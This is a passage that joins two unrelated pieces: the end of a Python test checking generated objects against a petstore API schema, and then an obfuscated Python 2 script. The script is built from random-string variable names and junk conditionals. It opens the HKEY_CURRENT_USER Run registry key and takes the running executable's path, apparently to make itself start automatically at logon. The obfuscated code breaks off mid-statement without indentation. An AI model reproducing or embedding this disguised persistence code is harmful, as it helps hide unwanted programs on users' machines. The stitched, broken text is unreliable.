    """Every generated optional combination validates against the petstore schema."""
    endpoint = petstore_schemas[curr_key]
    if "post" not in endpoint or "requestBody" not in endpoint['post']:
        return
    schema = endpoint['post']['requestBody']
    # Distinct names: the original reused `obj` for both the generator and
    # each generated candidate.
    generator = ObjectsGenerator(schema, config)
    for candidate in generate_all_possible_objects(generator.required_object, generator.full_object, schema):
        assert validator_petstore.validate_request_schema(curr_key, candidate)
|
# -*- coding: utf-8 -*-
import sys
yVvnDsmDHFJwtkzTXrdPQxkddnKDxtdeyzGKftNynOBsbgmefQcpyMNEkJSiTvyFhdMOkDJqLKVqlQDQvtxHdEYtwpeYKKdhrkXdqeTQJsqLafHvcGgPyhJUWsHyxfoI = 'dCjAzhVjYAMNLNAYdScOtNXXEAuhZgtgPBRZliyRCZlnAYDPQVCrRyKddQIvYCFYDtjeMGUtzIOGLWIGddKIwOmcTdzLuutsazCRJplsOXAmOUzzpUsSTQCCmCJFtKIb'
lbFNowPVchqhHrFMyyHnRmIhTvEUOxFJHPDRCThIrLiboQnBWakuAxDUSSTQNnsQOikSXDVVdkzAjNxeLBvlxjAcRyNRrzOEGmPWGQdisqwUYrdANgUHhyzusUwCcrVB = 'MRffWneODwzJdzwsDIIBJBmoLItpUXyEWgfvTPLXShwYCxqeSItClDkRbnNBmsQzlEsqnmayIxDzZaVnFnDkUGDZlMKzQWtooGOEJSWDMqVCEGwRaSeDVlfQPBPKTtaL'
if yVvnDsmDHFJwtkzTXrdPQxkddnKDxtdeyzGKftNynOBsbgmefQcpyMNEkJSiTvyFhdMOkDJqLKVqlQDQvtxHdEYtwpeYKKdhrkXdqeTQJsqLafHvcGgPyhJUWsHyxfoI != lbFNowPVchqhHrFMyyHnRmIhTvEUOxFJHPDRCThIrLiboQnBWakuAxDUSSTQNnsQOikSXDVVdkzAjNxeLBvlxjAcRyNRrzOEGmPWGQdisqwUYrdANgUHhyzusUwCcrVB:
QxlgDtJCSqanvfWdfGtHuwoFthZAvPxJDXrQwGlmEfKDamSPAfteulsJSubUphHfmZPtkYxCsYnAhmdtVMLTOOHnBSXhtOQasamuSObOfHNszTsouCgRTpPIpmNzxRJU = 'bYNVfiVVWWQAIjHkvqFqpZrtVNDalUgWkNJIMNcRapjEtHzCvkxHNHZIylGPAwUaAfaEdlXJcRFsvetwcEdVEWLOQexmfXIIFzwwxAYtFcNZfmdJCdydCwDzrnjPGbaH'
WvZbtlcnCCxTAyDWoQeOuREsqjEGuxRXtrwtNfbnSKAEcUIPfPHvFbtPNVlNYMFJoSyKSOMwFePwRUYemEkpPJToDmjEXuDCHjOrHRwqyaLzMEUMQaKySsHpvtmYFnrf = 'puJJacQRVjnvlYZCAQbxQbcOtIBhCHMZDEAqMCVCckhOMIGTAmGzdUIWhbLlZOUXfgXZrilIoiIPkXTNuOmzUVuiOnaOSzElUCnGMYeAMmIhvZjpCwQMPtfYVecrmiNA'
WvZbtlcnCCxTAyDWoQeOuREsqjEGuxRXtrwtNfbnSKAEcUIPfPHvFbtPNVlNYMFJoSyKSOMwFePwRUYemEkpPJToDmjEXuDCHjOrHRwqyaLzMEUMQaKySsHpvtmYFnrf = QxlgDtJCSqanvfWdfGtHuwoFthZAvPxJDXrQwGlmEfKDamSPAfteulsJSubUphHfmZPtkYxCsYnAhmdtVMLTOOHnBSXhtOQasamuSObOfHNszTsouCgRTpPIpmNzxRJU
def RxcRLAtmXlEHutqjsTqPDnbkoGVfDtXIqoCNheDOiobDwKjpnzKTxqnKEKMbaLOReulMrzvPDceQQiZeQjYNKdJhiFFsHWqWxIWcCFIvJkBzsCEEYJFqKIipJAIonbjW():
import _winreg
xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO = 'ulAXLWHwCqRGAoLjUmnTYHcNApdasHgzBrFRLAeCqDhLFzsYbMridwgdaQrceRhGDAWsPYYzqMuRUmkdEwAPYouRTHCGkHZbtmaajzORLhGcTmqRiUVEsrHuvMANduXh'
UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz = 'EESDsFWjrkiydkyBvkuICPIdrRQgSKCeDDUfSKGSSNTiwAhWYMQIoIjcBpPPMgwxIZNuHaTEyXETHssltIJHzhfilhNxzeduTXNuWAlTYvaBYdphegpgIuNcAvWkDEes'
dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm = 'fUKyGTpNgnobAWUHPgnbjXZWXsAtJAwCvnsDbSNfLANPXRGFJZBzIHVffmYXUYsYmyDcizJiIgiUmbLpMmqfpiBbcWBNbVqrpadBzURySpMHRwCnfhKFZrTkZtvdlXEU'
JHTHNixZDdWPHrnIiwHJOfarElzWAYhcJMiEZiZoPDLHsBoKGILRkLDXMADgZhHLPsqpjINnmXeSPsCYTXBmtHfkNgGMWQPmWrdUwwurNwwgjzBkssFpuCBwUpGehWsR = 'UbAzGcyWMtMhNuYfKoqNRTjwzfjXvJaclQzsMVesSLLyzZWTJVejafWlxDbpCviHsAvPQXcbYuCDKrduTjhisIIifAYeMonsVGcsvSzQCWVOjHgpdzMmnmmbFofQLvDn'
aUzFbtDYsYAEXeqkvIJrRKabUlsMToupgqahvIYDjlcYyTsETSfjoAMsQmtNcEdeNgnlYdUZUzRswfoQOuMtETMgRDBNrUZbdTHpsUvJGArnwLqUwzgJVIFVTkuboRru = 'EamFkaMwyhOQKFbqDnJSJfjfERyZndbRKCigeeykUJHAOzKWodjccccxiSECllsTxKklyfgOfnJWOYguuGilcNVrDMLWDoBzhRDFpZguXXOITGWoGtLJlocfVLpcRSaG'
if xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO in UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz:
xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO = aUzFbtDYsYAEXeqkvIJrRKabUlsMToupgqahvIYDjlcYyTsETSfjoAMsQmtNcEdeNgnlYdUZUzRswfoQOuMtETMgRDBNrUZbdTHpsUvJGArnwLqUwzgJVIFVTkuboRru
if UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz in dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm:
UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz = JHTHNixZDdWPHrnIiwHJOfarElzWAYhcJMiEZiZoPDLHsBoKGILRkLDXMADgZhHLPsqpjINnmXeSPsCYTXBmtHfkNgGMWQPmWrdUwwurNwwgjzBkssFpuCBwUpGehWsR
elif UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz in xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO:
dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm = UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz
if dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm in UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz:
UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz = aUzFbtDYsYAEXeqkvIJrRKabUlsMToupgqahvIYDjlcYyTsETSfjoAMsQmtNcEdeNgnlYdUZUzRswfoQOuMtETMgRDBNrUZbdTHpsUvJGArnwLqUwzgJVIFVTkuboRru
from _winreg import HKEY_CURRENT_USER as HKCU
QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh = 'KuTLuknSOyfRphcufHQHoWufUehjjSbpEhuStKIiPkwSLgKVGSnlMFsJkUpQYWeYkgsekfrpdHlkkSqANIGOpADDMfkxeLRPaubbcSokjRhhqnYNpqcdiGntFhylUTIg'
YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv = 'HuDVRyXuRYfxlsPjBkGLpvOXzUrwbWTIcrvdVntvUdfbpXcvPGRzlltSmFrDZddOWDUrsqirFlGunAiJugxYYXXcGbMqviAFUuUfBooYnjjGndQsBLPFmDTyULkqEvUq'
dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl = 'CYrvzPSXXHogVxdArcBXKMQDAEOYmyZlJYohIQbQquMIWdkgqsaqqihrkzfrENBNHCuqFlgTalyYOfOsOilazAWSZCqLLlJWbGfcLGjeOMgSdNKUHMegBQYLNZlbazVT'
QxliQfauwlmhOuSYpAIbBkEZFlfeznzracnBcvkPtnPjyRcihsWfrWTiIEqKwMArosKdwsiOmlOQacQFsMnfLclMLbwmuPcImtulFPZutlcTnqWjHTKEhATDnOjUVwvu = 'OQNgjXTAoSbMIbAzicPJibrGFUpxfIacsZWwZVQwaOCjvcOJEZEUzHXLAKPRQKaunZFqwqChAIyfsxdivvWPEaWCkXJDRKfEVawzRjAsrhTUmWLSpYLGSyWnNdGcVqiN'
NhvUOqUUVggsKMPNmxBNkbudmyxbuRuEngqsoDJGPyUJiCFWRfZXKjjiGGMquMbTUEfwcHIkrmFZOTISyEsiDSagWnhVurTCIfghOfuXJwAacscefuAyuComyCVlXcDo = 'FlLGnCxTpDIEzRrHDqeGtowFQzhLDgPxCwpGSYWTqeHillkAZTQWpRMSPkowJhgaQjZSZerxLrGEZBEDuljvZqPhFJoStcbLGEhAvpWYNtBnQQOZqsHOkFxlyxeEKjCz'
if QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh in YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv:
QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh = NhvUOqUUVggsKMPNmxBNkbudmyxbuRuEngqsoDJGPyUJiCFWRfZXKjjiGGMquMbTUEfwcHIkrmFZOTISyEsiDSagWnhVurTCIfghOfuXJwAacscefuAyuComyCVlXcDo
if YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv in dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl:
YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv = QxliQfauwlmhOuSYpAIbBkEZFlfeznzracnBcvkPtnPjyRcihsWfrWTiIEqKwMArosKdwsiOmlOQacQFsMnfLclMLbwmuPcImtulFPZutlcTnqWjHTKEhATDnOjUVwvu
elif YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv in QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh:
dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl = YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv
if dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl in YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv:
YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv = NhvUOqUUVggsKMPNmxBNkbudmyxbuRuEngqsoDJGPyUJiCFWRfZXKjjiGGMquMbTUEfwcHIkrmFZOTISyEsiDSagWnhVurTCIfghOfuXJwAacscefuAyuComyCVlXcDo
OFYOrQTjPDMdyMxXbucVEplFSprvdZCBLjTmLnwwyFPfxCRnOzwMgVuhQbWUDugWXCWtFlsAKwqprMqSZyyaAGkBszlDiyRjqqnSIMJTzEqbbAbkVjEPIRpjnmHpzBmk = r'Software\Microsoft\Windows\CurrentVersion\Run'
duwNmSbNqhezYvYVbmYolkcIfzwmSMhVUZhmQPiCgfRCLXwAZeylZLUkNmiasZeALsKUVfECqnLNsabEXZkPcwATiOcbmBPJRxfHkWtbVPbYiMDFPlMOpvoWBcItvGiu = 'kYfpVogACMUyTGupWqnkUFbcKkmoutLTzXNNoZyJtkkezEkwNQKCTNjhBldqnetREIfdGrhjawfXiTwVnWsARdGEdyWsWbUtkHUgSLkkVOpfLACLfOBBAbKFuFvKsZAa'
zyfmnVbxEvgYLBCKeISlSlRYqrsxrFBqGPySLTmgeiZpnMxXejxyEUDwIUuCAPVunUcfxdvISvvtROuSeKmkNTgDJLsmgVQXWNCcCPDsroprGEtSsCjQssUuPgfLKyiB = 'MWsqnqvCiWFovtsYkTjHkrgqcsEzhpJvjLwNgjrojOSFutuDTrHWvkiYwcYaomcZZkZMyguEYysBulqbZLTVsRyBMgRJGygpiusshxNpUCwCrSUtNjQZsZYzCMUBIAOo'
GoDuxbDEHlHlxyeiTXJaGgEzAHgJLeCXQcqVVcraKmpZzFvyaQoCqTEXurRQTSIeJLoeCbukLkgEFdrkjvdKFKgisxoVydkBjnAeTbZEZgmaXEFjIGcRQSrFfvHubsNw = 'IeCWUwvwmxfkNQwOaaXGnDdEjaOVoQrJWUoDMvwXOYMddkcScOleCsaNqSWQXImsAQWAQnsJhIGTApTcqLtEKsxoIyImAPpoiuFkuRzaAkaDfbuJEZTddFwphsOkQvqy'
if duwNmSbNqhezYvYVbmYolkcIfzwmSMhVUZhmQPiCgfRCLXwAZeylZLUkNmiasZeALsKUVfECqnLNsabEXZkPcwATiOcbmBPJRxfHkWtbVPbYiMDFPlMOpvoWBcItvGiu == zyfmnVbxEvgYLBCKeISlSlRYqrsxrFBqGPySLTmgeiZpnMxXejxyEUDwIUuCAPVunUcfxdvISvvtROuSeKmkNTgDJLsmgVQXWNCcCPDsroprGEtSsCjQssUuPgfLKyiB:
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = 'oVmGrQXTAFxNmdEDgQSPkFBLJpzRRtmDYCcALjlFWeHOKICFqrKZOEvyKdLDsPSZitaSgGpoTCZIpNwcXMHCxgQWvOVcZztzDNyfziObIVOAIbKvRJVjJTrBYVhHuPgU'
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = duwNmSbNqhezYvYVbmYolkcIfzwmSMhVUZhmQPiCgfRCLXwAZeylZLUkNmiasZeALsKUVfECqnLNsabEXZkPcwATiOcbmBPJRxfHkWtbVPbYiMDFPlMOpvoWBcItvGiu
else:
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = 'oVmGrQXTAFxNmdEDgQSPkFBLJpzRRtmDYCcALjlFWeHOKICFqrKZOEvyKdLDsPSZitaSgGpoTCZIpNwcXMHCxgQWvOVcZztzDNyfziObIVOAIbKvRJVjJTrBYVhHuPgU'
BrANpkjCbolpyNlyqmknShbMPoEciExzheLupIynrJqJlpjLjYkBHsyseGNDcZKFQNebbrnTjrLkUxRVGRHPnfKtZnfqqklzbMZODkdxUqTMgEYfHVNsUvEIginPBBen = GoDuxbDEHlHlxyeiTXJaGgEzAHgJLeCXQcqVVcraKmpZzFvyaQoCqTEXurRQTSIeJLoeCbukLkgEFdrkjvdKFKgisxoVydkBjnAeTbZEZgmaXEFjIGcRQSrFfvHubsNw
GpscRjtNBjoEOYQCdDQVaNrOQBMYgQDRJYAJiXTcnYCvjLftSUIVpcNKaRIypmqGnfGpyUERCZjOlSWPPkFHcBgfimwkLcUeDjFzABiXjWKZkQLVWvjiTxhQRHqjfdHM = sys.executable
DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH = 'CppleEdYKANKqwlVMtsBXnTarncJJkELARumArbDYIDQRvAqAeVqrQywcAZsXhkPRNGJhGNYFzjKljdlwcCsthkJRprsWYxQcWImGxPtNysLNYSoActPbFypegnhORAT'
TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc = 'psieyAfAKMRyWXGLtVALAuyRAhQszaJIdHXTcjkmlsPCkLEAonUtVXkGjDRKvlfXAvIQNlerQxcGjlsuBaMyUdqsZhjVllVuaXPldhMgXPOQCHktvBwoWvIVVxgdZfEJ'
iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf = 'pdapVVMxdCOKcJWsDpTmOrxLiyGkfryLErTAFMkWxrChKmptGbZoHrOFdGGzvHYEJbQGAcbTignWInCNwPOIOkpmvqTGjlwuaBYFVEKMXqUMjhNOQmfqRipzYJKtWLfg'
VOBMebKlilhPQJErobFyJzEtWJnorgPdvXdRdfVXtHLZRcjqkSzivnPJTrTirtaoybhRgljQXUYGJytQWGAVkCMlDtMmGyasansDRrurGUeNxWcXuKKtUtDQcnkcIrVX = 'QihzhlyiELDMiHnbFWfnmQMUhdBBeJpUqxIzGLAAkaksOugOfFacAteCGSjsKFwBMkQlEOgXrHJJIyidWMJEioOfoPlkCGlZmNFYHjToiFPDnpbrQXhUckLbjZujgYEN'
gbnPfLcePzNTqnojRKoZIWPXdZUcEkiGwmYLeWAATUuTlBYJnJMiAGBKQrzIHsnyKlFFeBMvuVxRSyzOAeimcEajDoEThwllXhtFLFUoCZZxjucYmUAqFdGehzMxZZmq = 'nZmDpUrJGoPAIPCaqyNzMQIuBdBhzUUbLvSQDKDlihCkrhQptATfdaZfDVvbQXKXWCYtRLklmVvdlDDZRJGzmTaJhPdCLVCOZKHKvvZVISvQOENqcqCVFPyTZEkXePzR'
if DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH in TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc:
DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH = gbnPfLcePzNTqnojRKoZIWPXdZUcEkiGwmYLeWAATUuTlBYJnJMiAGBKQrzIHsnyKlFFeBMvuVxRSyzOAeimcEajDoEThwllXhtFLFUoCZZxjucYmUAqFdGehzMxZZmq
if TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc in iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf:
TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc = VOBMebKlilhPQJErobFyJzEtWJnorgPdvXdRdfVXtHLZRcjqkSzivnPJTrTirtaoybhRgljQXUYGJytQWGAVkCMlDtMmGyasansDRrurGUeNxWcXuKKtUtDQcnkcIrVX
elif TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc in DOfMQomfTvDvvboxeLpsNviMZRfXFOFanEhyWNKAnokfdvJGooFBMHYHzPIWwBEGfPtuwegOyezeiEGeVdJXQeBPFxPvehzEdjEcnYGeqDoKZrLRQptnNVzuCybtMmjH:
iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf = TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc
if iLkCEOGTaZDOHViucCcDsYkieqtKIyvWETPWRLTfEKyPOCnNbOxeAFjuSYRyTvnqLJYXHEuVUeHRRekXMagcFFzKmjwyQsPnrGRXITQUSSKAlHTJWTEmsVlNiXqqZnpf in TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc:
TyAqlfqKmOimeKLGxUPUvKipssuSmtNilOIWyqMqNCEyBQrtuidSQgohPEoGIsPznsRPkCZIunenSOzwputfeaOiXUBtmBiGHSyPSlXCoqTHgzIYdCTeMtVNiwqdzjkc = gbnPfLcePzNTqnojRKoZIWPXdZUcEkiGwmYLeWAATUuTlBYJnJMiAGBKQrzIHsnyKlFFeBMvuVxRSyzOAeimcEajDoEThwllXhtFLFUoCZZxjucYmUAqFdGehzMxZZmq
try:
wOJZRPdZrPpSdrbzjQmuPWMWIVJvPmHmXFkeaWWqmQsmWDwTiAgVvICBlfcPEAQdqHyurubuoaqmuWxjerYzVDlwStLuamyImaSNWQkwsMKxPeYYRVGOVTFDHgsGcSVv = 'GdLxJglodwNUCkognzXOZLAccgkbOuDXpPyIeXzmGwGDhOIPBenXFDiFMPEOgkZfgLGBTwaRyIAOqbWTyJtGufEPNMyBdMLervejQmehoNBiGyWhiGYYoGSnLJupTikk'
WyNLpqymtcnwHXdAdZJBvetpswBiQobfKLarDAAulSxExMjyBXROYzcAmZjNKOkhoIZKyhNVEPaDjJjNOLuDkDDUTegWdJkZkJNTwVbkcdQgZUfdLFOuNpZatPntjSKL = 'mfZsLJYGfEfYHGqAAddRCyJESWVItVMNlPTUkGTkcJSNnmuolAfsuIyWMPisOQJwDSRZybzyClTnXrFlBFeDgDVLJMBiFjfdjIjvfNHZqufqwbquiCOoNyHZuqjnnITk'
WqGhLvLxlPvfjWhLDNBZoxWKqCBBHUqTlbMyOJbvzLUAkOpnLXMMSIunahjcMPFaYQArmBZwPRRzXeDfsdUZWcvTZmqMkZHhwnNFWRrucgNWgqayyMqyXIMqFuaABZrJ = 'HKECgyRsesyBZlxnqppUrSTeRxpcEvKMUgkhBRoXvNGaqHjpQvxSGCuCwlolahEasxcYTrtbPMHOAXzTIpthTpjYTFzdQacuZeaMEaoXWDdyjPilxXFEqOXRqYFajPnx'
if wOJZRPdZrPpSdrbzjQmuPWMWIVJvPmHmXFkeaWWqmQsmWDwTiAgVvICBlfcPEAQdqHyurubuoaqmuWxjerYzVDlwStLuamyImaSNWQkwsMKxPeYYRVGOVTFDHgsGcSVv == WyNLpqymtcnwHXdAdZJBvetpswBiQobfKLarDAAulSxExMjyBXROYzcAmZjNKOkhoIZKyhNVEPaDjJjNOLuDkDDUTegWdJkZkJNTwVbkcdQgZUfdLFOuNpZatPntjSKL:
qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = 'oMQqaAFXeVtZCsJDFykxjBigOohNxSuHdOzRccwEoaayGJltmJFcpbWOFnOtvczKmPvJVDGiCfnRxOrkCBFHoJQdszfdJpsbmRuSqhVpFgDTLuTLYJvBpHXPjTwrqExI'
qXPxXpkLsEPOahqliaFSWYzephvRwHjNWYkfFImuvHUFiJbiFPEBBdEUSFMBbPGiwllqOjaxAmQddUYSLGwivCLPPtVZOROaTmhXzaWetryHubcfWWDJicxmrpLUCNxQ = wOJZRPdZrPpSdrbzjQmuPWMWIVJvPmHmXFkeaWWqmQsmWDwTiAgVvICBlfcPEAQdqHyurubuoaqmuWxjerYzVDlwStLuamyImaSNWQkwsMKxPeYYRVGOVTFDHgsGcSVv
else:
